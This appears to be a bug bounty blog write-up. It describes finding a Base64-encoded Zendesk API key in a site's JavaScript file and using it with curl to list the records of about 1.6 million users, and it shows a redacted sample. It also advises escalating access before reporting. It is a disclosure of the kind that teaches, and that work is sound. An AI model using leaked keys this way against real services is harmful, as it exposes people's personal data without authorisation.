How i got access to 1600k Users PII Data $$$$

Gokul AP
3 min readApr 6, 2022

--

Hello Guys 👋 I am Gokul, Python developer, Cyber security researcher, Part time Bug hunter and Open source tool maker, Studying 3rd year Computer Science Engineering in Madurai, Tamilnadu !

My Social Media links :

Hey Let’s dive into the main topic, This is my first Blog post and i have been trying to make this writeup from long time but didn’t get time to make it, now we got it ready !

By the title you might have guessed the content, let’s see how i found that vulnerability and let’s take that target as target.com

On one Evening i was testing that target and i like to find bugs related to Session management and Logical errors, so i was testing a login feature and fired my burp and i was just manipulating the requests to see any sensitive actions/response but didn’t get anything and usually i will use Intercept, Repeater and Intruder alone in Burp, That day i decided to view the Burp HTTP History and saw all history of URLs logged there and i was just scrolling there and was seeing the response which contained JSON, but nothing sensitive !

Then saw a request /app.js in that history tab and i decided to view the source code (Because, most of the js files have unreadable names like fabi65c78.js etc..) but this app.js caught my eye, Usually filename app is kept to main files, so i was scrolling through the source code of that js file, Then i have seen a json inside that js file which had something like zendesk URL, FB App ID etc..

At first sight, I thought FBAppId is some Private data then researched about it and found that its just a public data, Then got “access token” in that same json and i have seen that it was Base64 Encoded so decoded the token and the result i got was “senior@target.com/token:xxxxxxxx” Then used Keyhacks repo and found that it was Zendesk api key !

It was my first API Key finding and i was so excited and I was like

Then i was about to report that to the Security team ! But my Mind :
“You got API key, but what’s it’s for ?”, I didn’t have any idea about what is Zendesk or didn’t know how to even use that API key. So made a little research about it so that i can increase the Impact, So refered many sites and got one documentation, In that it had https://{target}.zendesk.com/api/v1/users.json and i decided to authenticate this API endpoint against the API key, so first i have curled it, curl https://{target}.zendesk.com/api/v1/users.json

The Response was :

{"error":"Couldn't authenticate you"}

Then I used the API key, curl https://{target}.zendesk.com/api/v1/users.json -u (API_KEY)

{
"id": 123xxxxx,
"name": "Victim",
"email": "victim@gmail.com",
"created_at": "2015-11-25T06:00:20Z",
"updated_at": "2015-11-25T06:00:20Z",
"time_zone": "Ekaterinburg",
"iana_time_zone": "Asia/Yekaterinburg",
"phone": xxxxxxxxxx,
"shared_phone_number": null,
"photo": null,
"locale_id": 1,
"locale": "en-US",
"organization_id": null,
"role": "end-user",
"verified": false,
"external_id": null,
"tags": [],
"alias": null,
"active": true,
"shared": false,
"shared_agent": false,
"last_login_at": null,
"two_factor_auth_enabled": false,
"signature": null,
"details": null,
"notes": null,
"role_type": null,
"custom_role_id": null,
}
} "system::embeddable_last_seen": null
..........
..........
"count" : 1645729
}

I have got access to PII Details of Around 16 Lakh users !

Timeline :

  • Reported : March 6th 2022
  • Triaged : March 10th 2022
  • Confirmation : March 14th 2022
  • Bounty : 1500$

Tips :

  1. Always check Burp history
  2. Don’t report as soon as you find, increase the impact and then report

Thanks for Reading my writeup, I will make more writeups in the Future !

--

--